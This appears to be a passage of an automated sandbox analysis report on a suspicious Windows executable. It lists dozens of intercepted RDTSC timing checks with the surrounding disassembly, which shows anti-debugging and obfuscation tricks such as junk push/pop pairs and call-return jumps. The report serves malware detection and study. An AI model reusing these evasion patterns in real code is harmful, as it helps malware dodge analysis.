                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7FA second address: F4A802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A9A0 second address: F4A9A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A9A4 second address: F4A9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AB04 second address: F4AB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AB0F second address: F4AB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC2C8B95C76h 0x0000000a jbe 00007FC2C8B95C76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B3F3 second address: F4B3FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2C938495Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C3ED second address: F4C3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EECF second address: F4EEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007FC2C9384956h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EEE4 second address: F4EEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EEE8 second address: F4EEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F508AB second address: F508D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC2C8B95C80h 0x0000000b popad 0x0000000c jmp 00007FC2C8B95C84h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4F671 second address: F4F67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2C9384956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50F05 second address: F50F0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50F0A second address: F50F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+122D36EAh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC2C9384958h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a sub dword ptr [ebp+124471A9h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FC2C9384958h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D293Dh] 0x00000052 and esi, 241A9550h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FC2C9384960h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A13 second address: F51A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC2C8B95C8Fh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 or dword ptr [ebp+122D32D2h], edx 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 jmp 00007FC2C8B95C80h 0x0000001e pop edi 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+12441435h], ecx 0x00000027 xchg eax, ebx 0x00000028 push esi 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5182A second address: F5182F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A63 second address: F51A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A71 second address: F51A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52D74 second address: F52D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52D78 second address: F52DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jne 00007FC2C9384956h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edi 0x00000014 nop 0x00000015 mov edi, eax 0x00000017 push 00000000h 0x00000019 or di, C811h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FC2C9384958h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a xchg eax, ebx 0x0000003b jo 00007FC2C938495Eh 0x00000041 push ebx 0x00000042 jg 00007FC2C9384956h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FC2C938495Ah 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55E50 second address: F55E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55E57 second address: F55E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58F37 second address: F58FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B95C86h 0x00000009 popad 0x0000000a jmp 00007FC2C8B95C7Fh 0x0000000f popad 0x00000010 push eax 0x00000011 jp 00007FC2C8B95C7Eh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FC2C8B95C78h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FC2C8B95C78h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push 00000000h 0x00000050 jmp 00007FC2C8B95C89h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC2C8B95C81h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58FE1 second address: F58FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58FE7 second address: F58FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B08B second address: F5B09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C938495Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59106 second address: F591A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007FC2C8B95C7Bh 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e sub bl, FFFFFFAFh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 pushad 0x00000019 mov ebx, dword ptr [ebp+122D36C2h] 0x0000001f movzx edi, di 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov dword ptr [ebp+122D312Ch], esi 0x00000030 jmp 00007FC2C8B95C80h 0x00000035 mov eax, dword ptr [ebp+122D05F1h] 0x0000003b adc edi, 49CFD422h 0x00000041 push FFFFFFFFh 0x00000043 push edi 0x00000044 mov bl, 7Fh 0x00000046 pop ebx 0x00000047 or dword ptr [ebp+122D3388h], ecx 0x0000004d nop 0x0000004e pushad 0x0000004f js 00007FC2C8B95C8Bh 0x00000055 jmp 00007FC2C8B95C85h 0x0000005a push ebx 0x0000005b jmp 00007FC2C8B95C88h 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1C2 second address: F5A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C194 second address: F5C19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D0AD second address: F5D0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5DF7E second address: F5DF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D0B1 second address: F5D0BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2C9384956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EDA8 second address: F5EDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EDAC second address: F5EDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5E058 second address: F5E0DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, di 0x0000000c push dword ptr fs:[00000000h] 0x00000013 jmp 00007FC2C8B95C84h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FC2C8B95C78h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007FC2C8B95C84h 0x0000003e mov eax, dword ptr [ebp+122D165Dh] 0x00000044 push FFFFFFFFh 0x00000046 pushad 0x00000047 mov cx, dx 0x0000004a and eax, dword ptr [ebp+122D1B29h] 0x00000050 popad 0x00000051 nop 0x00000052 jo 00007FC2C8B95C80h 0x00000058 pushad 0x00000059 push edx 0x0000005a pop edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5E0DC second address: F5E0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FC2C9384956h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5FD06 second address: F5FD55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, si 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC2C8B95C78h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3256h], ebx 0x00000030 or dword ptr [ebp+122D3450h], ebx 0x00000036 push eax 0x00000037 jg 00007FC2C8B95C95h 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007FC2C8B95C76h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60CF4 second address: F60D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C938495Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5FF48 second address: F5FF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B95C83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F61D0E second address: F61D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC2C8B99096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F62C51 second address: F62C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64C59 second address: F64C7F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2C8B990A3h 0x00000008 jmp 00007FC2C8B9909Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jc 00007FC2C8B990A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FC2C8B99096h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64C7F second address: F64C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66A8B second address: F66A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66A95 second address: F66AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC2C8DD5F03h 0x0000000f jmp 00007FC2C8DD5EFDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66AB1 second address: F66B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+1244756Ch], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC2C8B99098h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F62D84 second address: F62D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60F04 second address: F60F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63D9F second address: F63DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jng 00007FC2C8DD5EF6h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65E18 second address: F65E1E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66BBD second address: F66BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60F24 second address: F60F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63DB4 second address: F63DB9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F67A67 second address: F67A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65E1E second address: F65E23 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6CC42 second address: F6CC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6CC47 second address: F6CC62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F06h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71A85 second address: F71A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71A9D second address: F71AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC2C8DD5F09h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71AC3 second address: F71B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8B990A3h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8B990A8h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FC2C8B990A6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71C77 second address: F71CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC2C8DD5F09h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8DD5F03h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71E46 second address: F71E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A6h 0x00000007 jng 00007FC2C8B99096h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77242 second address: F77262 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC2C8DD5F08h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77262 second address: F7726F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7726F second address: F772A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC2C8DD5EF6h 0x0000000a jmp 00007FC2C8DD5F01h 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 je 00007FC2C8DD5EF6h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC2C8DD5EFBh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77C3A second address: F77C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B990A9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77C5F second address: F77C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77C7A second address: F77C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F77C7E second address: F77C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC2C8DD5EF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7DA34 second address: F7DA4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7DA4F second address: F7DA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC2C8DD5EF6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7C771 second address: F7C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8B99096h 0x0000000a popad 0x0000000b jmp 00007FC2C8B9909Bh 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 ja 00007FC2C8B9909Ah 0x0000001c push edx 0x0000001d pop edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push esi 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop esi 0x00000024 jc 00007FC2C8B9909Eh 0x0000002a push eax 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7C7A5 second address: F7C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7CEBA second address: F7CED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2C8B990A7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7CED8 second address: F7CEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D2F6 second address: F7D302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D302 second address: F7D308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D308 second address: F7D30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D30C second address: F7D31E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8DD5EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FC2C8DD5EF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D31E second address: F7D332 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99096h 0x00000008 jng 00007FC2C8B99096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
